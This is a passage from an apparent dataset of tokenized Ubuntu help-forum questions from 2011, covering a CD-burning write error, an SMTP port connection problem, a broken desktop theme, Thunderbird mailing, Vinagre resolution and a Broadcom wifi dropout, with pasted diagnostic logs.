mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 7 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.5x . track 01 : 8 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 9 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 10 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 11 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 12 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 13 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 14 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 15 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 16 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 17 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 18 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 19 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 20 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 21 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 22 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 23 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 24 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 25 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 26 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 27 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 28 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 29 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 30 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 31 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 32 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 33 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 34 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.5x . track 01 : 35 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 36 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.5x . track 01 : 37 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 38 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.5x . track 01 : 39 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 40 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 41 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 42 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 43 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . track 01 : 44 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 45 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 46 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 47 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 48 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 49 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 50 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.4x . track 01 : 51 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 52 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 53 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 54 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 55 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 56 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 57 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.1x . track 01 : 58 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 59 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 60 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 61 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 62 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.3x . track 01 : 63 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.0x . track 01 : 64 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.2x . errno : 5 ( input/output error ) , write_g1 scsi sendcmd : no error cdb : 2a 00 00 00 81 16 00 00 1f 00 status : 0x2 ( check condition ) sense bytes : f0 00 03 00 00 7a a3 0a 00 00 00 00 0c 00 00 00 sense key : 0x3 medium error , segment 0 sense code : 0x0c qual 0x00 ( write error ) fru 0x0 sense flags : blk 31395 ( valid ) cmd finished after 18.085s timeout 40s /usr/bin/wodim : a write error occured . /usr/bin/wodim : please properly read the error message above . write track data : error after 67678208 bytes writing time : 79.157s average write speed 13.0x . min drive buffer fill was 100 % fixating ... warning : some drives do n't like fixation in dummy mode . fixating time : 0.001s /usr/bin/wodim : fifo had 1257 puts and 1067 gets . /usr/bin/wodim : fifo was 0 times empty and 1014 times full , min fill was 90 % . burn-free was never needed . cdrecord command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim -v gracetime=2 dev=/dev/sr0 speed=16 -tao -dummy driveropts=burnfree -multi -xa -tsize=77112s - mkisofs -- -- -- -- -- -- -- -- -- -- -- - 77112 i : -input-charset not specified , using utf-8 ( detected in locale settings ) 0.65 % done , estimate finish sun oct 30 09:42:14 2011 1.30 % done , estimate finish sun oct 30 09:39:43 2011 1.96 % done , estimate finish sun oct 30 09:38:50 2011 2.61 % done , estimate finish sun oct 30 09:38:25 2011 3.25 % done , estimate finish sun oct 30 09:38:10 2011 3.89 % done , estimate finish sun oct 30 09:38:00 2011 4.54 % done , estimate finish sun oct 30 09:37:53 2011 5.19 % done , estimate finish sun oct 30 09:37:47 2011 5.85 % done , estimate finish sun oct 30 09:37:43 2011 6.49 % done , estimate finish sun oct 30 09:37:39 2011 7.14 % done , estimate finish sun oct 30 09:37:37 2011 7.78 % done , estimate finish sun oct 30 09:38:00 2011 8.44 % done , estimate finish sun oct 30 09:37:56 2011 9.09 % done , estimate finish sun oct 30 09:37:53 2011 9.74 % done , estimate finish sun oct 30 09:37:50 2011 10.38 % done , estimate finish sun oct 30 09:38:26 2011 11.04 % done , estimate finish sun oct 30 09:38:30 2011 11.69 % done , estimate finish sun oct 30 09:38:34 2011 12.33 % done , estimate finish sun oct 30 09:38:38 2011 12.97 % done , estimate finish sun oct 30 09:38:33 2011 13.64 % done , estimate finish sun oct 30 09:38:37 2011 14.28 % done , estimate finish sun oct 30 09:38:40 2011 14.92 % done , estimate finish sun oct 30 09:38:42 2011 15.57 % done , estimate finish sun oct 30 09:38:45 2011 16.21 % done , estimate finish sun oct 30 09:38:47 2011 16.88 % done , estimate finish sun oct 30 09:38:43 2011 17.52 % done , estimate finish sun oct 30 09:38:46 2011 18.16 % done , estimate finish sun oct 30 09:38:48 2011 18.81 % done , estimate finish sun oct 30 09:38:50 2011 19.47 % done , estimate finish sun oct 30 09:38:51 2011 20.11 % done , estimate finish sun oct 30 09:38:53 2011 20.76 % done , estimate finish sun oct 30 09:38:50 2011 21.40 % done , estimate finish sun oct 30 09:38:51 2011 22.06 % done , estimate finish sun oct 30 09:38:53 2011 22.71 % done , estimate finish sun oct 30 09:38:54 2011 23.36 % done , estimate finish sun oct 30 09:38:56 2011 24.00 % done , estimate finish sun oct 30 09:38:57 2011 24.64 % done , estimate finish sun oct 30 09:38:54 2011 25.31 % done , estimate finish sun oct 30 09:38:55 2011 25.95 % done , estimate finish sun oct 30 09:38:56 2011 26.60 % done , estimate finish sun oct 30 09:38:58 2011 27.25 % done , estimate finish sun oct 30 09:38:59 2011 27.89 % done , estimate finish sun oct 30 09:39:00 2011 28.53 % done , estimate finish sun oct 30 09:38:57 2011 29.20 % done , estimate finish sun oct 30 09:38:58 2011 29.84 % done , estimate finish sun oct 30 09:38:59 2011 30.48 % done , estimate finish sun oct 30 09:39:00 2011 31.13 % done , estimate finish sun oct 30 09:39:01 2011 31.79 % done , estimate finish sun oct 30 09:39:02 2011 32.42 % done , estimate finish sun oct 30 09:39:00 2011 33.09 % done , estimate finish sun oct 30 09:39:00 2011 33.73 % done , estimate finish sun oct 30 09:39:01 2011 34.37 % done , estimate finish sun oct 30 09:39:02 2011 35.03 % done , estimate finish sun oct 30 09:39:03 2011 35.68 % done , estimate finish sun oct 30 09:39:03 2011 36.32 % done , estimate finish sun oct 30 09:39:01 2011 36.96 % done , estimate finish sun oct 30 09:39:02 2011 37.63 % done , estimate finish sun oct 30 09:39:03 2011 38.27 % done , estimate finish sun oct 30 09:39:03 2011 38.91 % done , estimate finish sun oct 30 09:39:04 2011 39.56 % done , estimate finish sun oct 30 09:39:05 2011 40.22 % done , estimate finish sun oct 30 09:39:03 2011 40.86 % done , estimate finish sun oct 30 09:39:04 2011 41.50 % done , estimate finish sun oct 30 09:39:04 2011 42.16 % done , estimate finish sun oct 30 09:39:05 2011 42.81 % done , estimate finish sun oct 30 09:39:05 2011 43.45 % done , estimate finish sun oct 30 09:39:06 2011 44.09 % done , estimate finish sun oct 30 09:39:04 2011 44.76 % done , estimate finish sun oct 30 09:39:05 2011 45.40 % done , estimate finish sun oct 30 09:39:05 2011 46.04 % done , estimate finish sun oct 30 09:39:06 2011 46.70 % done , estimate finish sun oct 30 09:39:06 2011 47.35 % done , estimate finish sun oct 30 09:39:07 2011 47.99 % done , estimate finish sun oct 30 09:39:05 2011 48.63 % done , estimate finish sun oct 30 09:39:06 2011 49.30 % done , estimate finish sun oct 30 09:39:06 2011 49.94 % done , estimate finish sun oct 30 09:39:07 2011 50.58 % done , estimate finish sun oct 30 09:39:07 2011 mkisofs calculate size command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage -gui -graft-points -print-size -quiet -volid crossroads -volset -appid k3b the cd kreator ( c ) 1998-2010 sebastian trueg and michal malek -publisher -preparer -sysid linux -volset-size 1 -volset-seqno 1 -sort /tmp/kde-rolandixor/k3bwr4619.tmp -rational-rock -hide-list /tmp/kde-rolandixor/k3bbz4619.tmp -joliet -joliet-long -hide-joliet-list /tmp/kde-rolandixor/k3bwd4619.tmp -no-cache-inodes -full-iso9660-filenames -iso-level 3 -path-list /tmp/kde-rolandixor/k3bmn4619.tmp mkisofs command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage -gui -graft-points -volid crossroads -volset -appid k3b the cd kreator ( c ) 1998-2010 sebastian trueg and michal malek -publisher -preparer -sysid linux -volset-size 1 -volset-seqno 1 -sort /tmp/kde-rolandixor/k3bym4619.tmp -rational-rock -hide-list /tmp/kde-rolandixor/k3bll4619.tmp -joliet -joliet-long -hide-joliet-list /tmp/kde-rolandixor/k3brc4619.tmp -no-cache-inodes -full-iso9660-filenames -iso-level 3 -path-list /tmp/kde-rolandixor/k3bhz4619.tmp using cdrecord as the backend , i get an error ( 254 ) , and it claims i may need to change the permissions ( which i tried ) . that does n't seem to work , and all the google searching i 've done seems useless . i recall something about power calibration failing - but i was on my way to bed , and later to church , when i was trying to burn the cd - so i did not have the time to record what it was . i have tried : sudo chmod 4755 /usr/bin/wodim - no go . btw - the drive can read cds just fine , though it takes forever to show what 's on them ( the laptop is a wee bit old ( almost 4 years ! ) , and i 've kept upgrading since 8.10 or 8.04 , so i think that might be the problem with the speed ) . is there a way around these errors ? or is this a hardware issue ? if i need to add more debugging info , let me know . i tried this on another system with 11.10 ( another laptop ) and it 's fine ... ( i 'm experienced enough so you can ask me to do dmesg and all the jazz : d ) .
73886	can not telnet to 25 port	i can not connect any mail server using telnet through 25 port . i can connect with any web-server using 80 port.so i searched for my open port sudo nmap -ss -p 20-2550 localhost it shows : nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.0000060s latency ) . not shown : 2524 closed ports port state service 22/tcp open ssh 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 631/tcp open ipp 902/tcp open iss-realsecure no 25 port open . when i try to connect with mail-server it just timeout . how could i enable telnet 25 port . thanks in advance
73889	how can i reset my desktop to be like new ?	after i upgraded to 11.10 , i made some mistake which totally destroyed unity ( i 'm not sure at all what i did ) . i deleted all the configuration files that i knew of , and now at least it will start , but it 's using the raleigh theme and the gnome icon theme . i ca n't do anything to change it in gnome-tweak or appearance settings . the problem is n't just limited to unity ; it affects gnome , too . if login to the guest session , everything is fine . the themes , theme engines , and icon themes are installed . note : i have tried everything , and no answer on this site has fixed my problem , including this one so is there a way to reset everything back the way it was , but still keep my bookmarks , passwords , and application settings ? unity -- reset does n't work .
73893	thunderbird addon to send one email to multiple recipients ?	is there a thunderbird plugin/addon to send one email to more than one recipient without using cc or bcc and only to field . i am not looking for a bulk mailer just something to help me email the same message to my employees without them knowing who i sent what to ?
73894	is it possible to remove `` nautilus search box '' from the desktop ?	the nautilus search box ( i do n't know if there is a name for it ) , it shows up whenever i start to type when i 'm on the desktop ( all applications are closed ) . is it normal feature ? is it a problem or a bug ? is it possible to remove it from the desktop only ?
73895	vinagre only gives 800x600 rdc resolution , how to increase ?	using vinagre on ubuntu 11.10 , when i rdc into a remote windows xp machine , i only get a 800x600 resolution on the remote display . i ca n't increase it on the windows machine , it 's stuck at 800x600 . any way to customise ? if i use terminal server client on ubuntu instead of vinagre , i can adjust the res . any way to fix for vinagre ?
73900	wireless dropping out on a bcm4313	my connection keep dropping out : i have to click on my home wifi-network to disconnect and reconnect to the internet . i tried to set mtu to 1500 as this post [ 1 ] suggest but my wireless keep dropping ! [ 1 ] http : //mylinuxramblings.wordpress.com/2011/10/16/how-to-stop-ubuntu-11-10-wireless-dropping-out/ the following question did not help me either : how do i stop my ethernet network connection from dropping ? my config is the following , ubuntu11.10 on hp pavilion dv6 , wifi using a wep key : $ lspci | grep -i eth 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) $ sudo lsmod | grep iwl nothing $ ifconfig eth0 link encap : ethernet hwaddr 2c:27 : d7 : ad : ed : fd up broadcast multicast mtu:1500 metric:1 packets reçus:0 erreurs:0 :0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:0 ( 0.0 b ) octets transmis:0 ( 0.0 b ) interruption:42 adresse de base:0x4000 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:16436 metric:1 packets reçus:2004 erreurs:0 :0 overruns:0 frame:0 tx packets:2004 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:149984 ( 149.9 kb ) octets transmis:149984 ( 149.9 kb ) wlan0 link encap : ethernet hwaddr 40:2c : f4:02 : e6 : a8 inet adr:192.168.0.100 bcast:192.168.0.255 masque:255.255.255.0 adr inet6 : fe80 : :422c : f4ff : fe02 : e6a8/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:335223 erreurs:0 :0 overruns:0 frame:0 tx packets:198348 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:424664317 ( 424.6 mb ) octets transmis:22730432 ( 22.7 mb ) $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 06 serial : 2c:27 : d7 : ad : ed : fd size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:4000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0d:00.0 logical name : wlan0 version : 01 serial : 40:2c : f4:02 : e6 : a8 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-12-generic firmware=n/a ip=192.168.0.100 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c4500000-c4503fff $ dmesg [ 9532.203125 ] wlan0 : no ipv6 routers present [ 9953.253505 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) [ 9953.253529 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : disassociated [ 9953.253544 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) [ 9953.253556 ] wlan0 : deauthenticating from 00:24 : d4:6c : a7:60 by local choice ( reason=3 ) [ 9953.381894 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 9953.381908 ] cfg80211 : restoring regulatory settings [ 9953.381989 ] cfg80211 : calling crda to update world regulatory domain [ 9953.394242 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394257 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394265 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394275 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394283 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394292 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394299 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394309 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394316 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394326 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394333 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394342 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394350 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394359 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394366 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394375 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394384 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394393 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394401 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394410 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394418 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 9953.394428 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 9953.394435 ] cfg80211 : disabling freq 2467 mhz [ 9953.394441 ] cfg80211 : disabling freq 2472 mhz [ 9953.394447 ] cfg80211 : disabling freq 2484 mhz [ 9953.394457 ] cfg80211 : world regulatory domain updated : [ 9953.394462 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 9953.394472 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9953.394481 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 9953.394491 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 9953.394500 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9953.394509 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9954.078437 ] wlan0 : authenticate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 9954.080078 ] wlan0 : authenticated [ 9954.080674 ] wlan0 : associate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 9954.084134 ] wlan0 : rx reassocresp from 00:24 : d4:6c : a7:60 ( capab=0x411 status=0 aid=1 ) [ 9954.084146 ] wlan0 : associated [ 9954.084733 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : true ( implement ) [ 9954.084753 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : associated [ 9954.084775 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 9954.178608 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 9964.500026 ] wlan0 : no ipv6 routers present [ 10129.310209 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 10129.315119 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 10129.316770 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 10129.318072 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 10129.324147 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 10129.324150 ] psmouse.c : issuing reconnect request [ 10295.864340 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) [ 10295.864364 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : disassociated [ 10295.864378 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) [ 10295.864389 ] wlan0 : deauthenticating from 00:24 : d4:6c : a7:60 by local choice ( reason=3 ) [ 10295.996982 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 10295.996997 ] cfg80211 : restoring regulatory settings [ 10295.997039 ] cfg80211 : calling crda to update world regulatory domain [ 10296.007372 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007387 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007395 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007405 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007413 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007423 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007431 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007440 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007448 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007458 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007465 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007475 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007483 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007491 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007497 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007506 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007512 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007522 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007529 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007539 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007547 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 10296.007556 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10296.007563 ] cfg80211 : disabling freq 2467 mhz [ 10296.007568 ] cfg80211 : disabling freq 2472 mhz [ 10296.007574 ] cfg80211 : disabling freq 2484 mhz [ 10296.007584 ] cfg80211 : world regulatory domain updated : [ 10296.007589 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 10296.007598 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10296.007608 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10296.007616 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10296.007626 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10296.007635 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10296.673333 ] wlan0 : authenticate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 10296.675742 ] wlan0 : authenticated [ 10296.676405 ] wlan0 : associate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 10296.679387 ] wlan0 : rx reassocresp from 00:24 : d4:6c : a7:60 ( capab=0x411 status=0 aid=1 ) [ 10296.679405 ] wlan0 : associated [ 10296.680038 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : true ( implement ) [ 10296.680059 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : associated [ 10296.680081 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 10296.772424 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 10306.995486 ] wlan0 : no ipv6 routers present [ 10959.473673 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) [ 10959.473697 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : disassociated [ 10959.473711 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) [ 10959.473721 ] wlan0 : deauthenticating from 00:24 : d4:6c : a7:60 by local choice ( reason=3 ) [ 10959.606133 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 10959.606148 ] cfg80211 : restoring regulatory settings [ 10959.606171 ] cfg80211 : calling crda to update world regulatory domain [ 10959.619338 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619353 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619362 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619372 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619380 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619389 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619397 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619407 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619415 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619424 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619432 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619441 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619450 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619459 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619467 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619477 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619484 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619494 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 